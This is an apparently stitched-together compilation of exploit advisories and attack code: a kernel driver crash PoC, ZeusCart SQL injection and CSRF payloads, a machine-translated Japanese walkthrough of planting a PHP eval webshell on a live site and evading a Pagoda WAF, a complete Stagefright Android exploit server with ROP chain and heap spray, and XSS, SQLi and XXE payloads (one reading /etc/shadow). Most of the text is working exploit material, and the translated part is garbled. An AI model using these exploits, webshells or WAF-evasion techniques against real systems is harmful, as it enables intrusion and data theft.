[esi+4] Resetting default scope CUSTOMER_CRASH_COUNT: 1 DEFAULT_BUCKET_ID: WIN7_DRIVER_FAULT BUGCHECK_STR: 0x8E PROCESS_NAME: python.exe CURRENT_IRQL: 0 ANALYSIS_VERSION: 6.3.9600.17336 (debuggers(dbg).150226-1500) x86fre LAST_CONTROL_TRANSFER: from 82843593 to 929ef938 STACK_TEXT: WARNING: Stack unwind information not available. Following frames may be wrong. 974f4afc 82843593 85de2a28 85490810 85490810 ndvbs+0x938 974f4b14 82a3799f 8460a668 85490810 85490880 nt!IofCallDriver+0x63 974f4b34 82a3ab71 85de2a28 8460a668 00000000 nt!IopSynchronousServiceTail+0x1f8 974f4bd0 82a813f4 85de2a28 85490810 00000000 nt!IopXxxControlFile+0x6aa 974f4c04 8284a1ea 00000078 00000000 00000000 nt!NtDeviceIoControlFile+0x2a 974f4c04 76fa70b4 00000078 00000000 00000000 nt!KiFastCallEntry+0x12a 0021f99c 00000000 00000000 00000000 00000000 0x76fa70b4 STACK_COMMAND: kb FOLLOWUP_IP: ndvbs+938 929ef938 8b4604 mov eax,dword ptr [esi+4] SYMBOL_STACK_INDEX: 0 SYMBOL_NAME: ndvbs+938 FOLLOWUP_NAME: MachineOwner MODULE_NAME: ndvbs IMAGE_NAME: ndvbs.sys DEBUG_FLR_IMAGE_TIMESTAMP: 3ec77b36 BUCKET_ID: OLD_IMAGE_ndvbs.sys FAILURE_BUCKET_ID: OLD_IMAGE_ndvbs.sys ANALYSIS_SOURCE: KM FAILURE_ID_HASH_STRING: km:old_image_ndvbs.sys FAILURE_ID_HASH: {e5b892ba-cc2c-e4a4-9b6e-5e8b63660e75} Followup: MachineOwner --------- 4. Mitigation and Remediation Recommendation No response from vendor; no remediation available. 5. Credit This vulnerability was discovered by Matt Bergin of KoreLogic Security, Inc. 6. Disclosure Timeline 2015.05.19 - KoreLogic requests a security contact from info@vboxcomm.com. 2015.05.29 - KoreLogic requests a security contact from {info,sales,marketing}@vboxcomm.com. 2015.08.03 - 45 business days have elapsed since KoreLogic's last contact attempt. 2015.09.11 - KoreLogic requests CVE from Mitre. 2015.09.12 - Mitre issues CVE-2015-6923. 2015.09.16 - Public disclosure. 7. Proof of Concept from sys import exit from ctypes import * NtAllocateVirtualMemory = windll.ntdll.NtAllocateVirtualMemory WriteProcessMemory = windll.kernel32.WriteProcessMemory DeviceIoControl = windll.ntdll.NtDeviceIoControlFile CreateFileA = windll.kernel32.CreateFileA CloseHandle = windll.kernel32.CloseHandle FILE_SHARE_READ,FILE_SHARE_WRITE = 0,1 OPEN_EXISTING = 3 NULL = None device = "ndvbs" code = 0x00000ffd inlen = 0x0 outlen = 0x0 inbuf = 0x1 outbuf = 0xffff0000 inBufMem = "\x90"*inlen def main(): try: handle = CreateFileA("\\\\.\\%s" % (device),FILE_SHARE_WRITE|FILE_SHARE_READ,0,None,OPEN_EXISTING,0,None) if (handle == -1): print "[-] error creating handle" exit(1) except Exception as e: print "[-] error creating handle" exit(1) #NtAllocateVirtualMemory(-1,byref(c_int(inbuf)),0x0,byref(c_int(0xffff)),0x1000|0x2000,0x40) DeviceIoControl(handle,NULL,NULL,NULL,byref(c_ulong(8)),code,inbuf,inlen,outbuf,outlen) CloseHandle(handle) return False if __name__=="__main__": main() The contents of this advisory are copyright(c) 2015 KoreLogic, Inc. and are licensed under a Creative Commons Attribution Share-Alike 4.0 (United States) License: http://creativecommons.org/licenses/by-sa/4.0/ KoreLogic, Inc. is a founder-owned and operated company with a proven track record of providing security services to entities ranging from Fortune 500 to small and mid-sized companies. We are a highly skilled team of senior security consultants doing by-hand security assessments for the most important networks in the U.S. and around the world. We are also developers of various tools and resources aimed at helping the security community. https://www.korelogic.com/about-korelogic.html Our public vulnerability disclosure policy is available at: https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v1.0.txt

ZeusCart 4.0: SQL Injection Security Advisory – Curesec Research Team 1. Introduction Affected Product: ZeusCart 4.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: support@zeuscart.com Vulnerability Type: SQL Injection Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 09/14/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description There are at least two SQL Injections in ZeusCart 4.0, one being a blind injection which does not require credentials to be exploited, the other being a standard injection in the admin area. Because the prevention of SQL Injection depends to a large part on applying simple filters on most input instead of using prepared stamements, it is highly likely that there will be more SQL injection vulnerabilities that are not covered here. 3. Timing based Blind SQL Injection There is a blind timing based SQL injection into the maincatid argument. An attacker does not need to be authenticated to exploit this. Proof Of Concept http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1 AND IF(SUBSTRING(version(), 1, 1)=5,BENCHMARK(500000000,version()),null) -> true http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1 AND IF(SUBSTRING(version(), 1, 1)=4,BENCHMARK(500000000,version()),null) -> false Please note that there is a bug when displaying featured items, so this will display an error message or show a blank page. The timing difference is still present, and can thus be exploited, but content based exploitation is not possible because of this. Also note that quotes may not be used in the payload, as quotes are sanitized. It is still possible to extract data: http://localhost/zeuscart-master/index.php?do=featured&action=showmaincatlanding&maincatid=-1 AND IF(ascii(substring((SELECT password from mysql.user limit 0,1),1,1))=42,BENCHMARK(500000000,version()),null) -> true, password hash starts with * Code /classes/Core/CFeaturedItems.php:52 $maincatid = $_GET['maincatid']; [...] $sql = "SELECT DISTINCT a.category_name AS Category,a.category_id AS maincatid, b.category_name AS SubCategory, b.category_id as subcatid, b.category_image AS image FROM category_table a INNER JOIN category_table b ON a.category_id = b.category_parent_id WHERE b.category_parent_id=".$maincatid." AND b.category_status=1 "; 4. SQL Injection in Admin Area All GET, POST, and REQUEST input is sanitized via filter_var($value, FILTER_SANITIZE_STRING), which offers some protection against SQL injection and XSS, but is not recommended as only defense. For many queries, there is no further defense via escaping or prepared statements. This makes all queries that get their data from different sources than GET, POST, and REQUEST - such as FILES -, and all queries containing unquoted parameters - such as seen in the blind injection above - vulnerable. Proof Of Concept The steps to reproduce this issue are as following Log in as admin Create a new product, using a file name for ufile[0] like: "image.jpgblla', description=(SELECT password FROM mysql.user limit 0,1), image='test Visiting http://localhost/zeuscart-master/admin/index.php?do=aprodetail&action=showprod&prodid=PRODUCTID will give the result of the injected query. Curl command to create a new product: curl -i -s -k -X 'POST' \ -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:40.0) Gecko/20100101 Firefox/40.0' -H 'DNT: 1' -H 'Content-Type: multipart/form-data; boundary=--------2025782171' \ -b 'PHPSESSID=hsa73tae4bq4ev381430dbfif0' \ --data-binary $'----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0aChoose Category\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"selcatgory[]\"\x0d\x0a\x0d\x0a25\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"product_title\"\x0d\x0a\x0d\x0aMYTESTPRODUCT2\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"sku\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"txtweight\"\x0d\x0a\x0d\x0a77\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"status\"\x0d\x0a\x0d\x0aon\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"ufile[0]\"; filename=\"image.jpgblla\', description=(SELECT password FROM mysql.user limit 0,1), image=\'test\"\x0d\x0aContent-Type: image/jpeg\x0d\x0a\x0d\x0acontent\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"price\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"msrp_org\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171\x0d\x0aContent-Disposition: form-data; name=\"soh\"\x0d\x0a\x0d\x0a555\x0d\x0a----------2025782171--\x0d\x0a' \ 'http://localhost/zeuscart-master/admin/index.php?do=productentry&action=insert' Code CProductEntry.php:313 $imgfilename= $_FILES['ufile']['name'][$i]; $imagefilename = date("Y-m-d-His").$imgfilename ; // generate a new name $image="images/products/". $imagefilename; // updated into DB [...] if($i==0) { $imgType='main'; $update="UPDATE products_table set image='$image',thumb_image='$thumb_image',large_image_path='$large_image' where product_id='".$product_id."'"; $obj->updateQuery($update); } else { $imgType='sub'; } if($_FILES['ufile']['name'][$i]!='') { $query_img="INSERT INTO product_images_table(product_id,image_path,thumb_image_path,type,large_image_path) VALUES('".$product_id."','$image','$thumb_image','$imgType','$large_image')"; $obj_img=new Bin_Query(); $obj_img->updateQuery($query_img); } } 5. Solution This issue was not fixed by the vendor. 6. Report Timeline 08/13/2015 Informed Vendor about Issue (no reply) 09/07/2015 Reminded Vendor of release date (no reply) 09/14/2015 Disclosed to public 7. Blog Reference: http://blog.curesec.com/article/blog/ZeusCart-40-SQL-Injection-56.html

0x00情報収集 メインサイトにはクラウドWAFがあるため、テストされるとすぐにブロックされ、予備テストで使用できる穴がないため、サブサイトに切り替えて、サブサイトを通じて貴重な情報を取得したいと考えています。 これは、プロキシアカウントを照会するサイトです。 URL入力管理者は自動的に背景にジャンプします。 このパラメーターを見て、それはcmfになるかもしれないと推測します 0x01 getShell ThinkCmfはたまたまRCEを持っています。あなたはそれを試すことができます ？a=fetchtemplatefile=public/indexprefix='' content=phpfile_put_contents（ 'test1.php'、 '？php @eval（$ _ post [zero]）？'）/php 白い画面は良い兆候です、それは成功する必要があります 訪問 Ant Sword Connectionを試して、エラーを直接報告してください。ファイアウォールに遭遇したのかもしれません その後、戻ってきて、シェルが手動でphpinfoを試してみてください 案の定、パゴダファイアウォールがあります 0x02パゴダファイアウォールをバイパス パゴダはいくつかの機能をフィルタリングする必要があるため、ペイロードを直接渡すことは間違いなく不可能であるため、トラフィックを難読化する必要があります。 すべてのペイロードBase64エンコーディングを転送してみてください コード化されたbase64は渡されるため、Xiao MAもそれに応じて変更を加える必要があります。合格したbase64を1回復号化するだけです。 ポニーは次のとおりです。 ？php @eval（base64_decode（$ _ post [zero]））; cghwaw5mbygpow==としてphpinfo（）; base64をエンコードします 送信 パゴダファイアウォールはもう傍受されておらず、パゴダファイアウォールをうまくバイパスしていることがわかります。 0x03アリの剣の変換 Base64エンコーディングを使用していますが、Ant Swordには実際に独自のBase64エンコーディングとデコーダーが付属しています。 付属のbase64エンコーダーを直接使用してみてください なぜこれが起こっているのですか？ アリの剣からの流れを分析しようとします げっぷにプロキシを設定します トラフィックを傍受します WAFによって簡単に認識される2つの場所が明らかにあることがわかります。 1つは次のとおりです。ユーザーエージェントヘッダーのキーワード：Antsword/v2.1これは、WAFに私が誰であるかを伝えることに相当するため、これが変更される最初のポイントです。 第二に、アリの剣のトラフィックには実際にキーワードがあります。たとえば、CMDパラメーターの後の評価base64_decodeはすべてであり、ポニーにはbase64復号化が付属しているため、デフォルトのエンコーダーを使用すると、WAFを通過できないだけでなく、wafがなければポニーに接続できないため、エンコーダーを自分で定義する必要があります。 新しいPHPエンコーダーを作成します payloadbase64を1回だけエンコードする必要があるため、データの割り当て['_'] Base64を直接処理できます。ランダムなパラメーターがあるかどうかは関係ありません。 エンコーダーは次のとおりです 「Strictを使用」; /* * @param {string} pwd接続パスワード * @param {array}エンコーダー処理前のデータペイロード配列 * @return {array}データエンコーダーによって処理されたペイロード配列 */ module.exports=（pwd、data、ext={}）={ data [pwd]=buffer.from（data ['_']）。toString（ 'base64'）; データを削除['_']; データを返す; } 次に、UAヘッダーを変更します エンコーダーの適用デコーダーはデフォルトで指定する必要はありません スパムデータとマルチパートパケットを追加することを選択することをお勧めします 接続をもう一度テストします 次に、ディレクトリをクリックして、まだ問題があることがわかります。ディレクトリを横断することはできません。この問題は、実際にはゴジラによって解決できます。ゴジラ馬をアップロードします。 誰かがここで尋ねてから、ゴジラの馬を直接アップロードするだけですか？実際の状況は、GETパラメーター送信に長さの制限があり、一部のシンボルにより、PHPファイルの切り捨てがそのままアップロードできなくなることです。 ウェブサイトはかなりありますが、メインサイトがないことは残念です。データベースには、プロキシアカウントがたくさんあります。それは時間の無駄です 0x03要約 1。BCのターゲットメインサイトにアクセスする場合、搾取可能な脆弱性はありません。サブサイトにアクセスして管理ディレクトリに入力することにより、背景にジャンプします。 2。CMSフィンガープリントクエリを介して、サブサイトはThinkCMFフレームワークであることがわかりました。3http://www.xxx.com/？a=fetchtemplatefile=public/indexprefix='content=file_put_put_contents（ZEL.PHP @evAl [ZEL。アクセスアドレスhttp://www.xxx.com/test1.phpに空白が表示されます。 5.アリの剣の接続を試して、エラーを直接報告し、ポストコマンドを実行し、Pagodaファイアウォールがhttp://wwwww.xxx.com/test1.phppost:zero=phpinfo(); 6;ここでRCEは、文を書いています。Base64Encryption3http://www.xxx.com/?a=fetchtemplatefile=public/indexprefix='Content=file_put_put_contents('test2.php','?php @eval（base64_decode（$ _ post [zero]）7。 phpinfo（）; base64としてcghwaw5mbygpow==としてbase64をエンコードし、http://wwwww.xxx.com/test2.phppost:zero=cghwaw5mbygpow5mbygpow==7 pagoda fir fir fir fir fir fir fir fir fira firewallは、アリのエージェントをインターセプトします。 CMDパラメーター。 1つは、ユーザーエージェントヘッダーのキーワード：Antsword/v2.1です。これは、WAFに私が誰であるかを伝えることと同等です。これは、変更される最初のポイントです。第二に、アリの剣のトラフィックは実際にはまだキーワードです。たとえば、CMDパラメーターの後の評価base64_decodeはすべてであり、私たちの小さな馬にはbase64 Decryption 8が付属しています。 /** @param {string} pwd接続パスワード* @param {array} data payload array before encoder processing* @return {array} data payload array andy encoder processing*/module.exports=（pwd、data、ext={}）={{{{{ data [pwd]=buffer.from（data ['_']）。toString（ 'base64'）; データを削除['_']; データを返す;} 9。 Ant Sword user-agentvaule:のリクエスト情報でUAヘッダー名:を通常のHTTP要求値に変更します。まだアクセスしないようにディレクトリをクリックします。 12.同じ方法を使用して、GodzillaのデフォルトのBase64エンコーダーをロードおよび改造します。これにより、パゴダファイアウォールをバイパスして通常アクセスできます。 オリジナルリンク：https://xz.aliyun.com/t/9295

ZeusCart 4.0: CSRF Security Advisory – Curesec Research Team 1. Introduction Affected Product: ZeusCart 4.0 Fixed in: not fixed Fixed Version Link: n/a Vendor Contact: support@zeuscart.com Vulnerability Type: CSRF Remote Exploitable: Yes Reported to vendor: 08/13/2015 Disclosed to public: 09/14/2015 Release mode: Full Disclosure CVE: n/a Credits Tim Coen of Curesec GmbH 2. Vulnerability Description None of the forms of Zeuscart have CSRF protection, which means that an attacker can perform actions for the victim if the victim visits an attacker controlled site while logged in. 3. Proof of Concept Change Admin Credentials: <form name="myform" method="post" action="http://localhost/zeuscart-master/admin/?do=adminprofile&action=update" enctype="multipart/form-data"> <input type="hidden" name="admin_name" value="admin2"> <input type="hidden" name="admin_email" value="admin2@example.com"> <input type="hidden" name="admin_password" value="admin"> </form> <script>document.myform.submit();</script> 4. Solution This issue was not fixed by the vendor. 5. Report Timeline 08/13/2015 Informed Vendor about Issue (no reply) 09/07/2015 Reminded Vendor of release date (no reply) 09/14/2015 Disclosed to public 6. Blog Reference http://blog.curesec.com/article/blog/ZeusCart-40-CSRF-58.html

#!/usr/bin/python2 import cherrypy import os import pwnlib.asm as asm import pwnlib.elf as elf import sys import struct with open('shellcode.bin', 'rb') as tmp: shellcode = tmp.read() while len(shellcode) % 4 != 0: shellcode += '\x00' # heap grooming configuration alloc_size = 0x20 groom_count = 0x4 spray_size = 0x100000 spray_count = 0x10 # address of the buffer we allocate for our shellcode mmap_address = 0x90000000 # addresses that we need to predict libc_base = 0xb6ebd000 spray_address = 0xb3000000 # ROP gadget addresses stack_pivot = None pop_pc = None pop_r0_r1_r2_r3_pc = None pop_r4_r5_r6_r7_pc = None ldr_lr_bx_lr = None ldr_lr_bx_lr_stack_pad = 0 mmap64 = None memcpy = None def find_arm_gadget(e, gadget): gadget_bytes = asm.asm(gadget, arch='arm') gadget_address = None for address in e.search(gadget_bytes): if address % 4 == 0: gadget_address = address if gadget_bytes == e.read(gadget_address, len(gadget_bytes)): print asm.disasm(gadget_bytes, vma=gadget_address, arch='arm') break return gadget_address def find_thumb_gadget(e, gadget): gadget_bytes = asm.asm(gadget, arch='thumb') gadget_address = None for address in e.search(gadget_bytes): if address % 2 == 0: gadget_address = address + 1 if gadget_bytes == e.read(gadget_address - 1, len(gadget_bytes)): print asm.disasm(gadget_bytes, vma=gadget_address-1, arch='thumb') break return gadget_address def find_gadget(e, gadget): gadget_address = find_thumb_gadget(e, gadget) if gadget_address is not None: return gadget_address return find_arm_gadget(e, gadget) def find_rop_gadgets(path): global memcpy global mmap64 global stack_pivot global pop_pc global pop_r0_r1_r2_r3_pc global pop_r4_r5_r6_r7_pc global ldr_lr_bx_lr global ldr_lr_bx_lr_stack_pad e = elf.ELF(path) e.address = libc_base memcpy = e.symbols['memcpy'] print '[*] memcpy : 0x{:08x}'.format(memcpy) mmap64 = e.symbols['mmap64'] print '[*] mmap64 : 0x{:08x}'.format(mmap64) # .text:00013344 ADD R2, R0, #0x4C # .text:00013348 LDMIA R2, {R4-LR} # .text:0001334C TEQ SP, #0 # .text:00013350 TEQNE LR, #0 # .text:00013354 BEQ botch_0 # .text:00013358 MOV R0, R1 # .text:0001335C TEQ R0, #0 # .text:00013360 MOVEQ R0, #1 # .text:00013364 BX LR pivot_asm = '' pivot_asm += 'add r2, r0, #0x4c\n' pivot_asm += 'ldmia r2, {r4 - lr}\n' pivot_asm += 'teq sp, #0\n' pivot_asm += 'teqne lr, #0' stack_pivot = find_arm_gadget(e, pivot_asm) print '[*] stack_pivot : 0x{:08x}'.format(stack_pivot) pop_pc_asm = 'pop {pc}' pop_pc = find_gadget(e, pop_pc_asm) print '[*] pop_pc : 0x{:08x}'.format(pop_pc) pop_r0_r1_r2_r3_pc = find_gadget(e, 'pop {r0, r1, r2, r3, pc}') print '[*] pop_r0_r1_r2_r3_pc : 0x{:08x}'.format(pop_r0_r1_r2_r3_pc) pop_r4_r5_r6_r7_pc = find_gadget(e, 'pop {r4, r5, r6, r7, pc}') print '[*] pop_r4_r5_r6_r7_pc : 0x{:08x}'.format(pop_r4_r5_r6_r7_pc) ldr_lr_bx_lr_stack_pad = 0 for i in range(0, 0x100, 4): ldr_lr_bx_lr_asm = 'ldr lr, [sp, #0x{:08x}]\n'.format(i) ldr_lr_bx_lr_asm += 'add sp, sp, #0x{:08x}\n'.format(i + 8) ldr_lr_bx_lr_asm += 'bx lr' ldr_lr_bx_lr = find_gadget(e, ldr_lr_bx_lr_asm) if ldr_lr_bx_lr is not None: ldr_lr_bx_lr_stack_pad = i break def pad(size): return '#' * size def pb32(val): return struct.pack(">I", val) def pb64(val): return struct.pack(">Q", val) def p32(val): return struct.pack("<I", val) def p64(val): return struct.pack("<Q", val) def chunk(tag, data, length=0): if length == 0: length = len(data) + 8 if length > 0xffffffff: return pb32(1) + tag + pb64(length)+ data return pb32(length) + tag + data def alloc_avcc(size): avcc = 'A' * size return chunk('avcC', avcc) def alloc_hvcc(size): hvcc = 'H' * size return chunk('hvcC', hvcc) def sample_table(data): stbl = '' stbl += chunk('stco', '\x00' * 8) stbl += chunk('stsc', '\x00' * 8) stbl += chunk('stsz', '\x00' * 12) stbl += chunk('stts', '\x00' * 8) stbl += data return chunk('stbl', stbl) def memory_leak(size): pssh = 'leak' pssh += 'L' * 16 pssh += pb32(size) pssh += 'L' * size return chunk('pssh', pssh) def heap_spray(size): pssh = 'spry' pssh += 'S' * 16 pssh += pb32(size) page = '' nop = asm.asm('nop', arch='thumb') while len(page) < 0x100: page += nop page += shellcode while len(page) < 0xed0: page += '\xcc' # MPEG4DataSource fake vtable page += p32(stack_pivot) # pivot swaps stack then returns to pop {pc} page += p32(pop_r0_r1_r2_r3_pc) # mmap64(mmap_address, # 0x1000, # PROT_READ | PROT_WRITE | PROT_EXECUTE, # MAP_PRIVATE | MAP_FIXED | MAP_ANONYMOUS, # -1, # 0); page += p32(mmap_address) # r0 = address page += p32(0x1000) # r1 = size page += p32(7) # r2 = protection page += p32(0x32) # r3 = flags page += p32(ldr_lr_bx_lr) # pc page += pad(ldr_lr_bx_lr_stack_pad) page += p32(pop_r4_r5_r6_r7_pc) # lr page += pad(4) page += p32(0x44444444) # r4 page += p32(0x55555555) # r5 page += p32(0x66666666) # r6 page += p32(0x77777777) # r7 page += p32(mmap64) # pc page += p32(0xffffffff) # fd (and then r4) page += pad(4) # padding (and then r5) page += p64(0) # offset (and then r6, r7) page += p32(pop_r0_r1_r2_r3_pc) # pc # memcpy(shellcode_address, # spray_address + len(rop_stack), # len(shellcode)); page += p32(mmap_address) # r0 = dst page += p32(spray_address - 0xed0) # r1 = src page += p32(0xed0) # r2 = size page += p32(0x33333333) # r3 page += p32(ldr_lr_bx_lr) # pc page += pad(ldr_lr_bx_lr_stack_pad) page += p32(pop_r4_r5_r6_r7_pc) # lr page += pad(4) page += p32(0x44444444) # r4 page += p32(0x55555555) # r5 page += p32(0x66666666) # r6 page += p32(0x77777777) # r7 page += p32(memcpy) # pc page += p32(0x44444444) # r4 page += p32(0x55555555) # r5 page += p32(0x66666666) # r6 page += p32(0x77777777) # r7 page += p32(mmap_address + 1) # pc while len(page) < 0x1000: page += '#' pssh += page * (size // 0x1000) return chunk('pssh', pssh) def exploit_mp4(): ftyp = chunk("ftyp","69736f6d0000000169736f6d".decode("hex")) trak = '' # heap spray so we have somewhere to land our corrupted vtable # pointer # yes, we wrap this in a sample_table for a reason; the # NuCachedSource we will be using otherwise triggers calls to mmap, # leaving our large allocations non-contiguous and making our chance # of failure pretty high. wrapping in a sample_table means that we # wrap the NuCachedSource with an MPEG4Source, making a single # allocation that caches all the data, doubling our heap spray # effectiveness :-) trak += sample_table(heap_spray(spray_size) * spray_count) # heap groom for our MPEG4DataSource corruption # get the default size allocations for our MetaData::typed_data # groom allocations out of the way first, by allocating small blocks # instead. trak += alloc_avcc(8) trak += alloc_hvcc(8) # we allocate the initial tx3g chunk here; we'll use the integer # overflow so that the allocated buffer later is smaller than the # original size of this chunk, then overflow all of the following # MPEG4DataSource object and the following pssh allocation; hence why # we will need the extra groom allocation (so we don't overwrite # anything sensitive...) # | tx3g | MPEG4DataSource | pssh | overflow = 'A' * 24 # | tx3g ----------------> | pssh | overflow += p32(spray_address) # MPEG4DataSource vtable ptr overflow += '0' * 0x48 overflow += '0000' # r4 overflow += '0000' # r5 overflow += '0000' # r6 overflow += '0000' # r7 overflow += '0000' # r8 overflow += '0000' # r9 overflow += '0000' # r10 overflow += '0000' # r11 overflow += '0000' # r12 overflow += p32(spray_address + 0x20) # sp overflow += p32(pop_pc) # lr trak += chunk("tx3g", overflow) # defragment the for alloc_size blocks, then make our two # allocations. we end up with a spurious block in the middle, from # the temporary ABuffer deallocation. # | pssh | - | pssh | trak += memory_leak(alloc_size) * groom_count # | pssh | - | pssh | .... | avcC | trak += alloc_avcc(alloc_size) # | pssh | - | pssh | .... | avcC | hvcC | trak += alloc_hvcc(alloc_size) # | pssh | - | pssh | pssh | avcC | hvcC | pssh | trak += memory_leak(alloc_size) * 8 # | pssh | - | pssh | pssh | avcC | .... | trak += alloc_hvcc(alloc_size * 2) # entering the stbl chunk triggers allocation of an MPEG4DataSource # object # | pssh | - | pssh | pssh | avcC | MPEG4DataSource | pssh | stbl = '' # | pssh | - | pssh | pssh | .... | MPEG4DataSource | pssh | stbl += alloc_avcc(alloc_size * 2) # | pssh | - | pssh | pssh | tx3g | MPEG4DataSource | pssh | # | pssh | - | pssh | pssh | tx3g ----------------> | overflow_length = (-(len(overflow) - 24) & 0xffffffffffffffff) stbl += chunk("tx3g", '', length = overflow_length) trak += chunk('stbl', stbl) return ftyp + chunk('trak', trak) index_page = ''' <!DOCTYPE html> <html> <head> <title>Stagefrightened!</title> </head> <body> <script> window.setTimeout('location.reload(true);', 4000); </script> <iframe src='/exploit.mp4'></iframe> </body> </html> ''' class ExploitServer(object): exploit_file = None exploit_count = 0 @cherrypy.expose def index(self): self.exploit_count += 1 print '*' * 80 print 'exploit attempt: ' + str(self.exploit_count) print '*' * 80 return index_page @cherrypy.expose(["exploit.mp4"]) def exploit(self): cherrypy.response.headers['Content-Type'] = 'video/mp4' cherrypy.response.headers['Content-Encoding'] = 'gzip' if self.exploit_file is None: exploit_uncompressed = exploit_mp4() with open('exploit_uncompressed.mp4', 'wb') as tmp: tmp.write(exploit_uncompressed) os.system('gzip exploit_uncompressed.mp4') with open('exploit_uncompressed.mp4.gz', 'rb') as tmp: self.exploit_file = tmp.read() os.system('rm exploit_uncompressed.mp4.gz') return self.exploit_file def main(): find_rop_gadgets('libc.so') with open('exploit.mp4', 'wb') as tmp: tmp.write(exploit_mp4()) cherrypy.quickstart(ExploitServer()) if __name__ == '__main__': main()

source: https://www.securityfocus.com/bid/57300/info Microsoft Lync is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to perform unauthorized actions on behalf of the victim. GET /JW926520 HTTP/1.0 Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/xaml+xml, application/vnd.ms-xpsdocument, application/x-ms-xbap, application/x-ms-application, */* Accept-Language: en-us User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)";var oShell = new ActiveXObject("Shell.Application");var commandtoRun = "C:\\Windows\\notepad.exe";oShell.ShellExecute(commandtoRun,"","","open","1");-" Host: meet.domainname.com Connection: Keep-Alive Cookie: LOCO=yes; icscontext=cnet; ProfileNameCookie=example

source: https://www.securityfocus.com/bid/57431/info phpLiteAdmin is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input before using it in an SQL query. Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. phpLiteAdmin 1.8.x and 1.9.x are vulnerable. http://www.example.com/phpliteadmin.php?action=row_view&table=' [ SQLi ]

source: https://www.securityfocus.com/bid/57444/info IP.Gallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied input before using it in an SQL query. A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. IP.Gallery 2.0.5 is vulnerable; other versions may also be affected. http://www.example.com/index.php?automodule=gallery&cmd=si&img=[SQL]

source: https://www.securityfocus.com/bid/57463/info Apache OFBiz is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks. Apache OFBiz versions prior to 10.04.05 and 11.04.02 are vulnerable. GET /exampleext/control/ManagePortalPages?parentPortalPageId=EXAMPLE"><script>alert("xss")</script> HTTP/1.1 Host: www.example.com:8443 User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:17.0) Gecko/20100101 Firefox/17.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: es-ar,es;q=0.8,en-us;q=0.5,en;q=0.3 Connection: keep-alive Referer: https://www.example.com:8443/exampleext/control/main?externalLoginKey=EL367731470037 Cookie: JSESSIONID=C3E2C59FDC670DC004A562861681C092.jvm1; OFBiz.Visitor=10002

source: https://www.securityfocus.com/bid/57465/info Classified Ultra is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. SQL-injection: http://www.example.com/demos/classifiedultra/subclass.php?c=16'[SQLi HERE] Cross-site scripting: http://www.example.com/demos/classifiedultra/subclass.php?c=6&cname=Credit%20Cards[XSS HERE]

source: https://www.securityfocus.com/bid/57496/info F5 Networks BIG-IP is prone to an XML External Entity injection vulnerability. Attackers can exploit this issue to obtain potentially sensitive information from local files on computers running the vulnerable application and to carry out other attacks. POST /sam/admin/vpe2/public/php/server.php HTTP/1.1 Host: bigip Cookie: BIGIPAuthCookie=*VALID_COOKIE* Content-Length: 143 <?xml version="1.0" encoding='utf-8' ?> <!DOCTYPE a [<!ENTITY e SYSTEM '/etc/shadow'> ]> <message><dialogueType>&e;</dialogueType></message> The response includes the content of the file: <?xml version="1.0" encoding="utf-8"?> <message><dialogueType>any</dialogueType><status>generalError</status><command>any</command><accessPolicyName>any</accessPolicyName><messageBody><generalErrorText>Client has sent unknown dialogueType ' root:--hash--:15490:::::: bin:*:15490:::::: daemon:*:15490:::::: adm:*:15490:::::: lp:*:15490:::::: mail:*:15490:::::: uucp:*:15490:::::: operator:*:15490:::::: nobody:*:15490:::::: tmshnobody:*:15490:::::: admin:--hash--:15490:0:99999:7:::